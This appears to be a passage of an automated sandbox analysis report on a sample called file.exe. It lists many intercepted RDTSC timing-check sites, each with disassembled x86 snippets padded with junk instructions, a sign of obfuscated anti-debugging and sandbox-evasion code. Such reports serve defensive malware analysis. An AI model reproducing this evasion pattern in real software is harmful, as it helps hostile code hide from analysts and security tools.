Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D34D3F second address: D34D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D34D48 second address: D34D53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FC3313C0916h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D34D53 second address: D34D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC330B7B0F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D34EAD second address: D34EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D34EB1 second address: D34EB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D34EB5 second address: D34EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D34EBB second address: D34ECB instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC330B7B102h 0x00000008 jns 00007FC330B7B0F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D34ECB second address: D34EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FC3313C0926h 0x0000000c pop esi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D34EF1 second address: D34EF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D34EF5 second address: D34EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D34EFB second address: D34F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D34F01 second address: D34F06 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D39A93 second address: D39A9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FC330B7B0F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D39A9D second address: D39AA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38933 second address: D38937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38937 second address: D3895E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC3313C0921h 0x0000000f jmp 00007FC3313C091Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3895E second address: D3896C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC330B7B0F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3896C second address: D38978 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38978 second address: D3897C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3897C second address: D389A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC3313C0926h 0x0000000d jo 00007FC3313C0916h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D389A0 second address: D389B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B103h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D389B7 second address: D389C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FC3313C0916h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D389C7 second address: D389CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D389CB second address: D389CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D389CF second address: D389DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC330B7B0F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0E35B second address: D0E361 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0E8DC second address: D0E92C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FC330B7B0F8h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007FC330B7B0F8h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c push 00000004h 0x0000002e sub cl, 0000005Ch 0x00000031 push eax 0x00000032 pushad 0x00000033 push ecx 0x00000034 jmp 00007FC330B7B101h 0x00000039 pop ecx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0ECFA second address: D0ECFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0EEA7 second address: D0EEB5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FC330B7B0FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0F1D7 second address: D0F1DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0F1DB second address: CEF8D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B0FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FC330B7B102h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007FC330B7B0F8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 jo 00007FC330B7B0FCh 0x00000036 or ecx, dword ptr [ebp+122D360Ah] 0x0000003c call dword ptr [ebp+122D1B7Bh] 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FC330B7B107h 0x00000049 je 00007FC330B7B112h 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEF8D4 second address: CEF8EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3313C0926h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEF8EE second address: CEF8F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEF8F4 second address: CEF926 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC3313C0916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC3313C0926h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC3313C091Bh 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CEF926 second address: CEF93F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B0FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d jnc 00007FC330B7B0F6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38DE6 second address: D38DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38DEC second address: D38DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38DFB second address: D38E05 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC3313C091Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38F8E second address: D38FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jbe 00007FC330B7B0F6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D394ED second address: D394F3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D394F3 second address: D39513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC330B7B106h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D39664 second address: D3967B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3313C091Ch 0x00000009 jl 00007FC3313C0916h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3967B second address: D39681 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D39681 second address: D3968B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC3313C0916h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D44192 second address: D44196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D44196 second address: D441B6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC3313C0916h 0x00000008 jmp 00007FC3313C0920h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D441B6 second address: D441CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FC330B7B0FAh 0x0000000c push eax 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC9348 second address: CC9384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FC3313C091Fh 0x0000000c jmp 00007FC3313C0928h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC3313C091Ch 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D42C25 second address: D42C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC330B7B0F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D42C31 second address: D42C6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC3313C091Bh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC3313C091Ah 0x00000012 ja 00007FC3313C092Ch 0x00000018 jmp 00007FC3313C0924h 0x0000001d push eax 0x0000001e pop eax 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D42F11 second address: D42F2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC330B7B0FFh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D42F2B second address: D42F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D42F2F second address: D42F47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC330B7B104h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D430A3 second address: D430A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D430A7 second address: D430AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D43339 second address: D4333E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D43487 second address: D43491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4359D second address: D435A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC3313C0916h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D435A7 second address: D435C8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC330B7B0F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jns 00007FC330B7B0F6h 0x00000011 pop edx 0x00000012 jl 00007FC330B7B0F8h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b push edi 0x0000001c push edx 0x0000001d push eax 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D435C8 second address: D435DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC3313C091Bh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D43757 second address: D4375B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4375B second address: D4376D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FC3313C091Ah 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D438D0 second address: D438D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D428BC second address: D428D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC3313C0922h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D428D5 second address: D428DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D428DB second address: D428DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D428DF second address: D428EF instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC330B7B0F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D472A7 second address: D472B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D472B0 second address: D472C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC330B7B0FBh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D472C2 second address: D472CC instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC3313C0916h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D472CC second address: D472D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D472D8 second address: D472E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FC3313C0916h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4B7F1 second address: D4B7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4B91E second address: D4B922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4C34B second address: D4C391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b jng 00007FC330B7B10Fh 0x00000011 popad 0x00000012 pushad 0x00000013 push esi 0x00000014 jmp 00007FC330B7B107h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4C391 second address: D4C3A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC3313C0921h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4F26A second address: D4F26E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4F26E second address: D4F274 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D56BA0 second address: D56BBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC330B7B0FAh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e jno 00007FC330B7B0F6h 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D56BBA second address: D56BCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C091Dh 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D56D45 second address: D56D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D56D4B second address: D56D76 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC3313C0916h 0x00000008 jmp 00007FC3313C0926h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jo 00007FC3313C0916h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D56D76 second address: D56D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D56D7B second address: D56D92 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC3313C0921h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D56D92 second address: D56D98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D56D98 second address: D56D9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D56D9C second address: D56DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D56EF2 second address: D56EFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D56EFC second address: D56F00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5703A second address: D57040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D57611 second address: D57615 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5803C second address: D58041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D58041 second address: D58059 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC330B7B103h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D58059 second address: D5805F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5B67E second address: D5B69F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jng 00007FC330B7B0F8h 0x0000000c pushad 0x0000000d je 00007FC330B7B0F6h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jp 00007FC330B7B0F6h 0x0000001b popad 0x0000001c push ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5BAB6 second address: D5BAE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3313C0921h 0x00000007 jne 00007FC3313C0916h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC3313C0921h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5BC1D second address: D5BC39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC330B7B0F6h 0x0000000a popad 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007FC330B7B0FCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
